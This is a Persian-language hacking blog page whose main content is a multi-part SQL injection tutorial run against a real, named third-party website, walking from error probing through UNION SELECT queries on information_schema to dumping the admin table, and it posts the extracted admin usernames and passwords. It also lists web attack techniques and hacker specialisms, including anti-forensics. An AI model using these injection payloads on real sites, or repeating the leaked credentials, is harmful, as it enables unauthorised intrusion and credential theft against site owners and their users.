loading...
مجتمع دیباگران حر
منوی اصلی سایت

 

 

مقالات

موبایل

هکینگ

در حال احداث

 
 

در حال احداث

در حال احداث

در حال احداث

در حال احداث

 
 

در حال احداث

در حال احداث

در حال احداث

در حال احداث
آخرین ارسال های انجمن
ka30r بازدید : 86 دوشنبه 1392/05/07 نظرات (0)

معمولاً سیستمی که به ویروس آلوده می‌گردد نشانه‌هایی را از خود بروز می‌دهد که با دقت در آنها می‌توان به ویروسی بودن احتمالی سیستم پی برد. بعضی از این نشانه‌ها در زیر آمده است. اما باید دقت داشت که این نشانه‌ها ممکن است در اثر عوامل غیرویروسی نیز ظاهر گردد. اما اگر کامپیوتر بطور عادی کار می‌کرده و ناگهان و بدون هیچگونه دستکاری، این علایم را از خود بروز می‌دهد، احتمال وجود ویروس بیشتر است:

۱ - سیستم در هنگام راه‌اندازی قفل می‌کند و احتمالاً پیغام‌های غیرمعمول روی صفحه ظاهر می‌گردد.

۲ - هنگام اجرای برنامه‌ها پیغام کمبود حافظه ظاهر شده و برنامه اجرا نمی‌گردد.

۳ - در کارچاپگر اختلال ایجاد می‌شود یا بدون هیچگونه فرمان چاپی شروع به کار می‌کند.

۴ - امکان دسترسی به برخی از درایوها وجود ندارد.

۵ - هنگام اجرای فایل‌ها، پیغام File is Damaged یا File is Corrupted نمایش داده می‌شود.

۶ - هنگام اجرای یک فایل، کاراکترها و یا پیغام‌های غیرعادی روی صفحه نمایش ظاهر می‌گردد.

۷ - هنگام کار در محیط‌های گرافیکی، تصاویر به هم می‌ریزد.

۸ - اصوات غیرمعمول یا موزیک از بلندگوهای کامپیوتر پخش می‌شود.

۹ - سیستم هنگام اجرای یک برنامه قفل کرده و حتی گاهی فشردن کلیدهای Ctrl+Alt+Del نیز نمی‌تواند سیستم را دوباره راه‌اندازی کند.

۱۰ - اطلاعات بخشی از دیسک سخت و یا تمام آن بطور ناگهانی از بین می‌رود یا دیسک سخت ناخواسته فرمت می‌شود.

۱۱ - اندازه فایل‌های اجرایی افزایش می‌یابد.

۱۲ - خواص فایل‌های اجرایی تغییر می‌کند.

۱۳ - سرعت سیستم بطور نامحسوسی کاهش می‌یابد.

۱۴ - اطلاعات Setup کامپیوتر از بین می‌رود.

۱۵ - برنامه‌ها مراجعاتی به دیسکت انجام می‌دهند که قبلاً انجام نمی‌دادند.

۱۶ - کاهش فضای خالی دیسک بدون اینکه فایلی اضافه شده و یا به محتوای فایل‌ها افزوده شده باشد.

۱۷ - نرم‌افزارهای مقیم در حافظه با خطا اجرا شده یا اصلاً اجرا نمی‌شوند.

۱۸ - بعضی برنامه‌ها سعی در برقراری ارتباط با اینترنت را دارند.

۱۹ - هنگام کار با اینترنت مقدار ارسال و دریافت اطلاعات ناخواسته افزایش یافته و سرعت به شدت افت می‌کند.

۲۰ - نامه‌های الکترونیکی ناخواسته از روی سیستم ارسال شده و یا دریافت می‌گردد.

ka30r بازدید : 105 پنجشنبه 1392/05/03 نظرات (0)

مروز یه آموزش خیلی راحت براتون دارم....


اگه یادتون بیاد تا اونجا پیشرفتیم که تونستیم لیست column های موجود در table آدمین رو کش بریم

که اینا بودن "id,loginname,namelc,email,created,modified,modifi edby,password,passwordchanged,superuser,disabled"

خوب کار ما از این راحت تر نمیشد!!!

الان تنها کاری که لازمه انجام بدیم اینه که اطلاعاتی که از توی این لیست ها لازم داریم رو درخواست کنیم

برای این کار از دستوری به شکل زیر استفاده میکنیم.

کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(loginname,char(58),password),3,4,5,6,7,8,9,10,11,12,13 from phplist_admin--


اگر دقیق به این دستور نگاه کنید میبینید که تفاوت چندانی با دستورات قبلی ما نداره و تنها کاری که من انجام دادم این بود که به دیتابیس سایت گفتم اطلاعات موجود در Loginname و password رو که توی تیبل phplist_admin هستش به من نشون بده. با دستور group_concat هم که آشنا هستید.....
تنها نکته ای که میشه اینجا اشاره کرد (char (58 هستش که دلم میخواد خودتون برین بفهمید چیه .

هرکی نفهمید پ.خ کنه تا کامل براش توضیح بدم.


دوستان ما با استفاده از باگ sql تونستیم به دیتابیس سایت نفوذ کنیم و یوزر و پسورد رو بکشیم بیرون :
"admin:coshuk,listadminassword,listadmin2assword,listadmin3assword"

ka30r بازدید : 149 پنجشنبه 1392/05/03 نظرات (0)

خوب بریم به ادامه ی آموزش هامون برسیم تا اونجا پیش رفتیم که با دستور table_name اسم تمام table ها رو کشیدیم بیرون به این صورت :


کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables--


حالا باید table مورد نظرمون رو انتخاب کنید.

من لیست table های تارگتمون رو کپی میکنم اینجا تا روش بحث کنیم.
[CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,category,country_master,eventlog,insurance_setup, link_master,phplist_admin,phplist_admin_attribute, phpli

خوب حالا ما از کجا بدونیم اطلاعاتی که ما میخوایم تو کدوم table موجوده؟؟


ما دنبال user و pass میگردیم پس به احتمال زیاد این اطلاعات تو یه table مربوط به ادمین وجود داره ....

اون table هایی که رنگشون رو بنفش کردم table های مربوط به information_schema هستش و در تمام ورژن های بالا ی 5 وجود داره و معمولا توی این table ها چیزه به درد بخوری برای ما وجود نداره 
بقیه ی table ها رو ما به ترتیب اولویت ( که از رو اسم و تجربه ی هکر بدست مییاد ) باید بگردیم...

اولین table ای که من نگاه میکنم و به احتمال زیاد اطلاعاتی که میخوام اونجاست phplist_admin تیبل هستش اگه اینجا نباشه میرم دنبال بقیه ی تیبل ها

بریم ببینیم چطوری و با چه دستوری باید اطلاعات تیبل phplist_admin رو بیرون بکشیم!!!

برای اینکه من اطلاعات رو از table مورد نظر خودم بکشم بیرون اولین کاری که انجام میدم اینه که column های موجود در تیبل مورد نظرم رو از information_schema درخواست میکنم 

به این صورت :

کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=phplist_admin--


تو دستور بالا من با دستور column_name از پایگاه information_schema در قسمت columns خواستیم که تمام اطلاعات مربوط به تیبل phplist_admin رو به ما بده 

ولی این دستور کار نکرد !!!!! 

چرا کار نکرد ؟؟؟؟؟؟؟

خوب دلیلش اینه که بعضی وقت ها برای اینکه هکر ها کارشون سخت تر شه روی اطلاعات مهم یه سری کار های امنیتی انجام میدن 
مثلا تو این مورد اطلاعات اسم column های موجود رو ما باید به صورت چار (CHAR) درخواست کنیم 
char کلمات رو به کارکتر های موجود روی کیبورد تبدیل میکنه در اصل char همون مخفف charecter هستش......
برای اینکه بتونید از char راحت تر استفاده کنید پیشنهاد میکنم از افزونه ی HACKER BAR موجود در fire fox استفاده کنید این افزونه به شما کمک می کنه به راحتی هر کلمه ای رو به چار تبدیل کنید 

خوب حالا من میام phplist_admin رو به چار تبدیل میکنم که میشه :

CHAR(112, 104, 112, 108, 105, 115, 116, 95, 97, 100, 109, 105, 110)


حالا اینو به جای اسم table خودم میزارم و دوباره دستور رو اجرا میکنم.....


کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(112, 104, 112, 108, 105, 115, 116, 95, 97, 100, 109, 105, 110)--


خوب همونطور که میبینید ما تونستیم column های موجود در table ادمین رو ببینیم و همونطور که میبینید اطلاعات مورد نیاز ما هم همینجاست!!!!!!!!!!!!!!!!


توی آموزش بعدی نحوه ی بدست آوردن این اطلاعات رو بهتون نشون میدم 

با استقبالتون خستگی کار یادم میره !!!!

امیدوارم مفید واقع شه

ka30r بازدید : 90 پنجشنبه 1392/05/03 نظرات (0)

خوب دوستان عزیز 

در ادامه ی این آموزش ها میرسیم به دستور table_name که به ما لیست table های موجود در دیتابیس رو می ده 
خوب برای این کار ما میتونیم این دستور رو به صورت (group_concat(table_name استفاده کنیم
همونطور که قبلا هم توضیح دادم دستور group_concat اطلاعات درخواستی ما رو از تمام database ها میده پس ما در این دستور تمام تیبل ها رو از تمام دیتابیس های موجود در سایت درخواست کردیم.
خوب دوستان اگه یادتون باشه تارگتی که ما انتخاب کردیم دارای دیتابیس ورژن بالای 5 بود که این خبر خوبی برای ما بود 
به این دلیل که تمام اطلاعات مورد نیاز ما در یک database جدا به نام information_schema ذخیره شده 
پس تنها کاری که نیازه ما انجام بدیم اینه که با نوشتن یک دستور بر روی table آسیب پذیر این اطلاعات رو از information_schema بخوایم


خوب بریم ببینیم روی تارگتمون میتونیم پیاده کنیم یا نه!!!!


کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13 from information_schema.tables--


خوب تو دستور بالا من اول مثل تمامی مثال های قبل یه منفی پشت عدد ID گذاشتم تا تعداد table های ما از تعداد id ما کمتر نشه (یا از بازه خارج شه )
بعد اومدم تو table آسیب پذیر از دستور group_concat استفاده کردم که اطلاعات مورد نیازم رو از تمامی دیتابیس های موجود در سایت به طور کامل بهم بده
بعد توی group_concat گفتم که من نام تمامی تیبل هارو میخوام که اونم با دستور table_name درخواست میشه ....
و در آخر هم نشانی یا همون آدرس جایی رو که این اطلاعات ذحیره شده رو دادم به این صورت:
همون طور که حتم دارم همتون میدونید from یعنی از !!!!
information_schema هم که همون پایگاه موجود در دیتابیس هایی با ورژن بالای 5 است که کار مارو خیلی راحت کرده بود !!!!!!!!!!
table . هم که یه دایرکتوری تو information_schema هستش که اطلاعات تیبل ها اونجا میره و .....

پس ما اومدیم گفتیم اسم تیبل ها رو از تمامی دیتابیس های سایت که توی information_schema در قسمت table موجود هست به ما بده به همین راحتی 

اینم از table ها برین تمرین کنید 
آموزش های بعدی رو هم سعی میکنم هر چه زودتر براتون بنویسم 

 

ka30r بازدید : 121 پنجشنبه 1392/05/03 نظرات (0)

قبل از ادامه ی درس ها تصمیم گرفتم چند تا از دستورات مهم رو براتون تک تک با کارش توضیح بدم که درک بهتری از sql داشته باشید



خوب ما تا اونجا پیش رفتیم که تعداد table ها رو پیدا کردیم و table نفوذ پزیر رو مشخص کردیم

حالا یک سری دستور بهتون یاد میدم که برای جمع آوری اطلاعات به کار میره :

اولین دستور که استفادده میکنیم دستور () version هستش که همونطور که از اسمش مشخصه به ما ورژن دیتابیس رو مشخص می کنه

دونستن ورژن دیتابیس به ما تو بعضی از ریزه کاری های نفوذ کمک میکنه
برای مثال ورژن هایی با دیتابیس بالا ی 5 دارای یک دیتابیس جداگانه به نام informatin_schema هستند که اطلاعات مربوط به پیکر بندی سایت در آن قرار میگیرد و ما میتوانیم اسامی table ها رو با دستور مناسب از information_schemaدرخواست نماییم

ولی اگر ورژن دیتابیس از 5 پایین تر باشد پایگاه informatin_schema وجود نخواهد داشت و ما باید table ها رو حدس بزنیم که کار سختی برای یک هکر تازه کار است...


دستور بعدی دستور user () هستش که به ما اطلاعاتی از user ها ی اصلی سایت رو مشخص میکنه و زمانی به درد ما میخوره که ما نمیتونیم به سایت نفوذ کنیم ولی میتونیم این دستورات رو اجرا کنیم و با این کار ما اطلاعات جمع آوری میکنیم !!!


دستور سوم دستور () group_concat هستش که به ما تمامی اطلاعات فراخوانی شده رو از تمامی دیتابیس های سایت میده
مثلا اگر ما دستور user() رو اجرا کنیم و فقط یک یوزر به ما بده ما میتوانیم با دستور (()Group_concat(user تمامی یوزر های سایت رو در صورت وجود فراخوانی کنیم ....


تا همینجا اکتفا میکنم به این دستور ها ولی بهتون میگم که دستورات کاربردی بهتری وجود داره که من دیگه اینجا توضیح نمیدم تا مقداری از کار به عهده ی خود شما باشه ......

خوب دوستان

مثال اول برای دستور ()version هستش :

کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13--


خوب همونطور که مشاهده میکنید تارگت ما دارای ورژن دیتابیس 5 به بالا هستش که کار ما رو خیلی راحت تر میکنه

دستور دوم

دستور () user هستش که یوزر ها رو برامون لیست میکنه 

کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,user(),3,4,5,6,7,8,9,10,11,12,13


برای دستور سوم هم در جلسه ی چهارم آموزش sql مثال میزنم چون توضیحاتش مفصل تره

موفق و پیروز باشید

ka30r بازدید : 117 پنجشنبه 1392/05/03 نظرات (0)

آموزش سوم در رابطه با پیدا کردن table های آسیب پذیر با دستور union select هستش

برای این کار پس از پیدا کردن تعداد table ها به صورت زیر عمل میکنیم :

کد:
www.site.com/html/images.php?id=-27 union select [ table ha be tartib ]



دقت کنید که قبل از شماره ی ایدی از یک منفی استفاده میشه

پس شما اگر فرض کنید که ما 10 table داشته باشیم دستور ما به این صورت خواهد بود :


کد:
www.site.com/html/images.php?id=-27 union select 1,2,3,4,5,6,7,8,9,10--




با این دستور اعدادی بر روی صفحه نمایان میشوند که همان شماره ی table ها ی اسیب پذیر هستن

تو پست بعدی یک مثال از این درس براتون میزارم تا کامل متوجه بشید

خوب دوستان ما تو مثال دوم با دستور order by تعداد table ها رو پیدا کردیم که 13 تا بود

حالا می خواهیم ببینیم کدوم یک از این 13 تا table آسیب پذیر هستش

برای این کار من با همون target قبلیمون پیش میرم و به صورت زیر دستور خودم رو وارد می کنم :

کد:
http://www.coshuk.com/html/images.php?id=-27 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--



حالا اگه دقت کنید عدد 2 رو روی صفحه میبینید که شماره ی table آسیب پذیر ما هست و ما با استفاده از این table کد های خودمون رو اینجکت میکنیم


هیشه پیروز باشید

ka30r بازدید : 103 پنجشنبه 1392/05/03 نظرات (0)

صمیم گرفتم رو همون مثال درس 1 دستورات درس دوم رو هم پیش برم که بهتر متوجه بشید

اگر یادتون باشه تو درس 1 تا اونجا پیشرفتیم که ERROR رو تو صفحه مشاهده کردیم به این صورت :

کد:
www.coshuk.com/html/images.php?id=27'


حالا میخواهیم با دستور order by x تـعداد table هامون رو مشخص کنیم

پس به این صورت عمل میکنیم :

کد:
http://www.coshuk.com/html/images.php?id=27 order by 20--


همونطور که مشاهده کردید error داد پس تعداد table ها کمتر از 20 هست

پس باید عدد رو کمتر کنیم

اگر یکی یکی تعداد اعداد رو کم کنیم تا جایی که دیگه error نده
اولین عددی که error نداد میشه شماره ی table ما

تو مثال ما : 

کد:
http://www.coshuk.com/html/images.php?id=27 order by 14--


در عدد 14 error میده

ولی تو عدد 13 error نمیده و سایت کامل Load میشه 

کد:
http://www.coshuk.com/html/images.php?id=27 order by 13--


پس تعداد table های ما 13 تا هست

اینم از مثال درس دوم

موفق باشید

ka30r بازدید : 98 پنجشنبه 1392/05/03 نظرات (0)

خوب عزیزان

قسمت بعدی کار ما شمردن table های سایت و یافتن تیبل های آسیب پذیر برای نفوذ هستش

برای این کار اولین قدم ما استفاده از دستور order by x هستش که به جای x یک عدد به صورت دلخواه میگذاریم

اگر سایت کامل Load شد یعنی تعداد table ها بیشتر از آن است و اگر سایت ناقص load شد یا اصلا load نشد به این معنا است که تعداد آن ها از آن عدد کمتر است ...


برای مثال : 

کد:
www.site.com/html/images.php?id=27 order by 20--


اگر سایت کامل load نشه به این معناست که تعداد table ها کمتر از 20 است و ما اعداد را یکی یکی کم میکنیم تا تعداد table ها رو مشخص کنیم

فرض کنید که سایت در 15 به صورت کامل load نشه ولی در 14 به صورت کامل Load شه در این حالت نتیجه میگیریم که تعداد table ها 14 تا هستش ....

خوب دوستان این آموزش هم تموم شد

توی پست بعدی سعی میکنم یک مثال هم براتون پیدا کنم

موفق باشید

ka30r بازدید : 100 پنجشنبه 1392/05/03 نظرات (0)

برای اینکه بعضی از بچه ها با درک مطالب بدون مثال مشکل داشتن قرار شد بعد از هر جلسه ی آموزش یک مثال هم گذاشته بشه براتون
خوب تو جلسه ی قبل یاد گرفتیم که چطوری آسیب پذیری یه سایت رو تست بزنیم

مثال قدم به قدم این آموزش به صورت زیر هستش :

اول یه تارگت رو انتخاب کردیم برای مثال :

کد:
http://www.coshuk.com


حالا سایت رو میگردیم تا قسمتی از سایت رو پیدا کنیم که URL اون دارای id=عدد باشه همونطور که گفته شده بود 

کد:
http://www.coshuk.com/html/images.php?id=27


خوب حالا برای اینکه ببینیم آسیب پذیری وجود داره یا نه باید یکی از پارامتر های درس قبلی رو اظافه کنیم و ببینیم که error میده یا نه
به این صورت : 

کد:
http://www.coshuk.com/html/images.php?id=27'



خوب همونطور که متوجه شدید ERROR زیر رو مشاهده میکنیم که به معنیه آسیب پذیر بودن سایت هستش :

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by pk_image_id DESC' at line 1

راستی اینم بگم که برای انتخاب تارگت میتونید از dork های sql استفاده کنید و برای یافتن باگ درون سایت از اسکنر استفاده کنید که آموزش اون هارو هم در پست های بعدی میدم ...

موفق باشید

ka30r بازدید : 100 پنجشنبه 1392/05/03 نظرات (0)

خب باگ بعدی که قراره آموزش بدم یک باگ کاربردی تر به نام باگ sql هست که به روش sql injection میتونیم به دیتابیس سایت نفوذ کنیم و یوزر پسورد رو بدست بیاریم

خوب آموزش هام رو با باگ SQL شروع میکنم امیدوارم که مورد پسندشما عزیزان باشه


خوب injection یا تزریق دستورات sql به پایگاه داده ها یا همون database() هستش که موجب دسترسی ما به پایگاه اطلاعاتی یک سایت میشه

قدم اول شناسایی اینه که سایت مورد نظر باگ داره یا نه ،

Login Page

Search Page

Feedback

HTML pages use POST command to send parameters to another ASP page


و هر صفحه ای که به ما اجازه ی input data رو بده



اینا جاهاییه که معمولا ما دنبال این نوع آسیب پذیری میگردیم ،


اما همیشه نیاز به submit page نیست و کارمون با صفحات (asp. php. cgi. jsp.) را میوفته، مثلا :

http://site.com/index.asp?id=number


برای برسی آسیب پذیر بودن سایت راه های زیادی بسته به تارگت وجود داره

استفاده از پارامتر هایی مثل : * و % و - و ' و '' و ; و

into login, or password, or even the URL .

مثال هایی برای این :



در بعضی مواقع یک پارامتر جواب نمیده و باید چند تا از پارامتر ها رو با هم بکار برد :


login : ,'user
pass:,'pass
http://site.com/index.asp?id=',number




اگر بعد از وارد کردن پارامتر ها با error هایی همانند error های زیر روبرو شدید باید به باگ SQL شک کنید و سعی به نفوذ ( یا پچ) کنید!!


The page cannot be displayed

ther is a problem with the page you are trying to reach and it cannot be displayed

microsoft JET database engin eroor '80040e14'




امیدوارم قابل درک بوده باشه تا جایی که تونستم راحت و قابل فهم توضیح دادم
اگه کم و کاستی بود به بزرگی خودتون ببخشید

ka30r بازدید : 260 پنجشنبه 1392/05/03 نظرات (0)

باید بهتون بگم یه هکر باید پیشه ی خودشو انتخاب کنه و یه راه رو تا آخر بره وقتی که کامل یاد گرفت بره پیشه ی بعدی رو یاد بگیره 
یکی از تقسیم بندی های رایج به این صورت هست :

1. هک سایت ها و سرور ها 
2. هک کلاینت ها و سیستم های شخصی

در این جا قسمت اول رو ابتدا جمع آوری می کنم :

1. هک سایت ها و سرور ها 

 

خوب من تا اونجا که تونستم سعی کردم یه لیست کاملی از تمامی باگ ها و راه های نفوذ به سایت ها و سرور ها جمع آوری کنم ،
که اینجا خدمت شما عزیزان میزارم تا یه طبقه بندی ای قبل از شروع تو ذهن خودتون داشته باشید ،


ليست تمام تکنيک هاي حمله به سايت ها ( ليست تمامي باگ )

* Arbitary File Deletion
* Code Execution
* Cookie Manipulation ( meta http-equiv & crlf injection )
* CRLF Injection ( HTTP response splitting )
* Cross Frame Scripting ( XFS )
* Cross-Site Scripting ( XSS )
* Directory traversal
* Email Injection
* File inclusion
* Full path disclosure
* LDAP Injection
* PHP code injection
* PHP curl_exec() url is controlled by user
* PHP invalid data type error message
* PHP preg_replace used on user input
* PHP unserialize() used on user input
* Remote XSL inclusion
* Script source code disclosure
* Server-Side Includes (SSI) Injection
* SQL injection
* URL redirection
* XPath Injection vulnerability
* EXIF
* Blind SQL injection (timing)
* Blind SQL/XPath injection (many types)
* 8.3 DOS filename source code disclosure
* Search for Backup files
* Cross Site Scripting in URI
* PHP super-globals-overwrite
* Script errors such as the Microsoft IIS Cookie Variable Information Disclosure


حمله های مشهور به حمله های دیکشنری ای :

* Cross Site Scripting in path
* Cross Site Scripting in Referer
* Directory permissions ( mostly for IIS )
* HTTP Verb Tampering ( HTTP Verb POST & HTTP Verb WVS )
* Possible sensitive files
* Possible sensitive files
* Session fixation ( jsessionid & PHPSESSID session fixation )
* Vulnerabilities ( e.g. Apache Tomcat Directory Traversal, ASP.NET error message etc )
* WebDAV ( very vulnerable component of IIS servers )


حمله های مشهور به افشاء جستجو :

* Application error message
* Check for common files
* Directory Listing
* Email address found
* Local path disclosure
* Possible sensitive files
* Microsoft Office possible sensitive information
* Possible internal IP address disclosure
* Possible server path disclosure ( Unix and Windows )
* Possible username or password disclosure
* Sensitive data not encrypted
* Source code disclosure
* Trojan shell ( r57,c99,crystal shell etc )
* ( IF ANY )Wordpress database credentials disclosure


آپلود فایل :

* Unrestricted File Upload


حمله های رایج :

* Microsoft IIS WebDAV Authentication Bypass
* SQL injection in the authentication header
* Weak Password
* GHDB - Google hacking database ( using dorks to find what google crawlers have found like passwords etc )


حمله های وب و سروری :

* Application Error Message ( testing with empty, NULL, negative, big hex etc )
* Code Execution
* SQL Injection
* XPath Injection
* Blind SQL/XPath injection ( test for numeric,string,number inputs etc )
* Stored Cross-Site Scripting ( XSS )
* Cross-Site Request Forgery ( CSRF )


نکته : البته باید بگم یاد گیری و به حافظه سپردن تمامی این مطالب تقریبا غیر ممکن هست و ما تا اونجا که میشه سعی در آشنایی شما با باگ ها رو داریم ولی قرار نیست تمام اونها رو مو به مو اینجا یاد بدیم
اون وظیفه ی شماست که مطالبی که اینجا آموزش داده میشه رو یاد بگیرید و به دنبال راه های بیشتر بگردید به هر حال یک هکر واقعی خودش باگ پیدا میکنه و میسازه نه اینکه از دسترنج بقیه استفاده کنه ....


خوب امیدوارم که این اطلاعات براتون مفید باشه ...

ka30r بازدید : 120 پنجشنبه 1392/05/03 نظرات (0)

انواع تخصص هکر ها :

برای اینکه انواع تخصص هکر ها را متوجه شوید ما چارت یک تیم هکری کامل را در اینجا می آوریم.

    

البته این چارت میتواند بنا به نیاز هر تیم کامل تر و یا کاملا متفاوت باشد.

ما تخصص های امنیت و هکینگ رو به چند دسته تقسیم کردیم و برای هر یک چند نفر را در نظر گرفتیم .


1- متخصص تست نرم افزارها : افراد این بخش مسلط به برنامه نویسی و آسیب پذیری های نرم افزار ها هستند که خود این شاخه به چند قسمت تقسیم میشود.

یک نکته وجود داره که در تمام مباحث اکسپلویت نویسی و مهندسی معکوس فهم زبان اسمبلی یک پیشنیاز است حالا بسته به نوع هدف نوع اسمبلی مورد نیاز با توجه به معماری پردازنده و متفاوت است که میتواند
(با تشکر از دوستان بابت تذکر)

اکسپلویت نویسی :

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :

• آشنایی کامل با برنامه نویسی به زبان C/C++ و پایتون
• آشنایی کامل با هسته ی ویندوز و لینوکس و برنامه نویسی سیستمی
• آشنایی کامل با نحوه ی مدیریت حافظه در ویندوز و لینوکس
• آشنایی کامل با انواع روش های تخرب حافظه در قسمت های heap , stack و ...
• آشنایی کامل با سیستم های محافظتی حافظه و روش های دور زدن آنها

مهندسی معکوس :

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• آشنایی کامل با روش های دیباگینگ و تحلیل فایل های اجرای
• آشنایی کامل با ابزارهای موجود مانند Ollydbg , IDA Pro , Windbg , Immunity DBG
• آشنایی کامل با تکنیک های شکستن محافظت های نرم افزاری
• آشنایی کامل با روش های تحلیل وصله های امنیتی

Fuzzer & Fault Injection:

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• آشنایی کامل با روش های مختلف Fuzzing
• آشنایی کامل با ابزار های اصلی این زمینه مانند Sully , Spike , FileFuzz و ...
• آشنایی کامل پرتکل های مختلف و مفاهیمی مانند : RFC و نحوه ی تست پرتکل ها
• آشنایی کامل با ساختار فایل های اجرایی در ویندوز و لینوکس برای اجرای Fuzzing
• آشنایی کامل با انواع روش های کشف آسیب پذیری نوین

تحلیل گر امنیتی برنامه های متن باز :

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• آشنایی کامل با زبان های برنامه نویسی / Java C/C++
• آشنایی کامل با روش های کشف آسیب پذیری مبتنی بر این زبان مانند سرریزی ها
• آشنایی کامل با ابزار های موجود برای افزایش سرعت این کار مانند RATS و SFIRE و ...

تحلیل گر برنامه های مخرب (malware analyst):

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• آشنایی کامل با روش های دیباگینگ و تحلیل فایل های اجرای
• آشنایی کامل با ابزارهای موجود مانند Ollydbg , IDA Pro , Windbg , Immunity DBG
• آشنایی کامل با انواع تکنیک های ضد دیباگینگ و روش های دور زدن آنها
• آشنایی کامل با نحوه ی کار برنامه های مخرب در شبکه و در فایل اجرایی

2- متخصص تست وب : افراد این بخش مسلط به برنامه نویسی و آسیب پذیری های نرم افزار های تحت وب هستند که خود این شاخه به چند قسمت تقسیم میشود.

محقق امنیتی برنامه های تحت وب:

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• آشنایی کامل با آسیب پذیری های موجود در برنامه های تحت وب
• قابلیت تحقیق و به نتیجه رسانیدن آسیب پذیری های عمومی تحت وب
• آشنایی کامل با زبان های برنامه نویسی تحت وب مانند PHP , ASP , ASP.net

تحلیل گر امنیتی متن باز:

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• آشنایی کامل با زبان های برنامه نویسی تحت وب مانند PHP , ASP , ASP.net , JSP , ...
• آشنایی کامل با روش کشف آسیب پذیری تحت وب با در دست داشت کد منبع
• آشنایی کامل با انواع آسیب پذیری های تحت وب (OWASP Top 10)

تحلیل گر امنیتی برنامه های تحت وب بدون داشتن کد برنامه :

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• آشنایی کامل به انواع انوع اسکنر های تحت وب مانند Acunetix , Appscan و ...
• آشنایی کامل با انواع روش های تست وب سایت بدون در دست داشتن متن برنامه
• آشنایی با ساختار وب سایت ها و تشخیص نقطه ی آسیب پذیر

3- متخصص تست شبکه : افراد این بخش مسلط به آسیب پذیری های شبکه هستند که خود این شاخه به چند قسمت تقسیم میشود.

تحلیل گر شبکه:

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :

• آشنایی کامل با پرتکل های شبکه ای مختلف
• آشنایی کامل با سخت های مختلف در زمینه ی ارتباط شبکه مانند مسیریاب ها
• آشنایی کامل با تکنیک های شناسایی شبکه و شناسایی بستر ورود و ارتباط
• آشنایی کامل با تنظمیات و نرم افزار های شبکه در حد مدارک CCNP , MCSE

تحلیل گر امنیتی شبکه:

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :

• آشنایی کامل با روش های محافظت از شبکه و روش های دور زدن آنها
• آشنایی کامل با نحوه ی کار دیواره های آتش , IDS / IPS و نحوه ی دور زدن آنها
• آشنایی کامل با تکنیک های پیشرفته جمع آوری اطلاعات شبکه به صورت کور و مخفی
• آشنای با ابزار های شناسایی سریع شبکه و توانایی تحلیل بسته های شبکه

4- متخصص مهندسی اجتماعی : فردی که میتواند براحتی از افراد دیگر اطلاعات بکشد یا آنها را مجبور به کاری کند

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• قدرت و فن بیان بسیار قوی و قابلیت جمع آوری اطلاعات فردی در صورت مکالمه
• توانایی تحلیل محیط و داده های مختلف برای کشف هویت
• کار کردن با ابزار های جمع آوری اطلاعات

5- متخصص Forensics / Anti : فردی که میتواند جرم شناسی انجام دهد یا جرم اثرات جرم را از میان ببرد.

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• آشنایی با دور زدن تکلنولوژی های مورد استفاده برای پاک کردن همیشگی فایلها
• آشنایی با کشف سریع ردپا از روی اطلاعات باقی مانده روی سیستم
• آشنایی با روشهای بازگردادن اطلاعات قدیمی و مخفی شده
• آشنایی با موارد و مشکلات قانونی امنیت شبکه و راههای گریز از آنها

6- هکر سخت افزار : افراد این بخش مسلط به سخت افزار , روش های بازتولید , الکترونیک و ... هستند که خود این شاخه به چند قسمت تقسیم میشود.

متخصص الکترونیک:

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• آشنایی کامل با سخت افزار های مختلف و توانایی ساخت سخت افزار هایی جدید
• آشنایی با روش های مختلف دستکاری سخت افزار های موجود
• آشنایی با نحوه ی کار سخت افزار های مخرب (ابزار های شنود و ...)
• توانایی اجرای مهندسی معکوس بر روی سخت افزارهای مختلف
• خلاقیت

متخصص مخاربرات:

فردی که میخواهد در این قسمت کار کند باید مهارت های چند گانه ای در زمینه ی های زیر داشته باشد :
• آشنایی کامل با سخت افزار های و نرم افزار های سیستم های مخابراتی
• آشنایی با مفاهیم ضد امنیتی در زمینه تجهیزات مخاربراتی روش های شنود و ....

7- رمزشناس :
 افراد این بخش مسلط به رمزنگاری , ریاضی و ... هستند.

